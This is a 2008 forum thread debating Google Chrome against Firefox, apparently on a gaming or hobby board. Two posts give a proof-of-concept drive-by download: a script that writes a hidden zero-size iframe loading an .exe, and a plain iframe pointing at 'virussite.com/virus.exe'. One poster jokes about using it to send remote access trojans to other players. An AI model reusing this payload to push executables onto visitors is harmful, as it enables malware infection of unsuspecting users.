google chrome users, read.

~~enraged~~ · 02-12-2008, 12:31 AM

Im sick of people saying chrome owns firefox and that. Maybe its a bit faster, but it's easily exploitable..
Yeah, there is an exploit for google chrome that allows malicious users to make visitors to their site automatically download, and run a program (often trojans/keyloggers) without the victims authentication.
Just a heads up.
If it's been patched, my bad

timROGERS · 02-12-2008, 05:10 PM

Got a link to the exploit information?

Tomm · 02-12-2008, 05:22 PM

It was where it could automatically download a file without consent (The download was clearly visable to the user). However, it would not automatically run it and has now, to my knowledge, been patched.

~~enraged~~ · 02-12-2008, 06:30 PM

************************************************** *************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
************************************************** ************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

**HotelUser** · 02-12-2008, 07:16 PM

Chrome is not superior....not yet anyways. It's still glitchy.

~~enraged~~ · 02-12-2008, 07:47 PM

By the time chrome is superior, the makers of IE will be dead and Firefox will be able to make cups of tea.

Fehm · 02-12-2008, 07:57 PM

Originally Posted by enraged

By the time chrome is superior, the makers of IE will be dead and Firefox will be able to make cups of tea.

Lol that was a clever play on words. but i agree

**Recursion** · 02-12-2008, 07:58 PM

IE won't be dead while Windows is alive.

And considering Apple are now recommending Anti Virus apps...

Decode · 02-12-2008, 08:01 PM

Originally Posted by timROGERS

Got a link to the exploit information?

You could simply do this-

<iframe src="http://virussite.com/virus.exe"></iframe>

and it would download automatically. If you ran an exe file that you didn't download then you would be an idiot.

~~enraged~~ · 02-12-2008, 09:10 PM

Originally Posted by Decode

You could simply do this-

<iframe src="http://virussite.com/virus.exe"></iframe>

and it would download automatically. If you ran an exe file that you didn't download then you would be an idiot.

pretty good exploit to send RATS to rich noobs on habbo tho lol

Thread: google chrome users, read.

Thread Tools

google chrome users, read.

Posting Permissions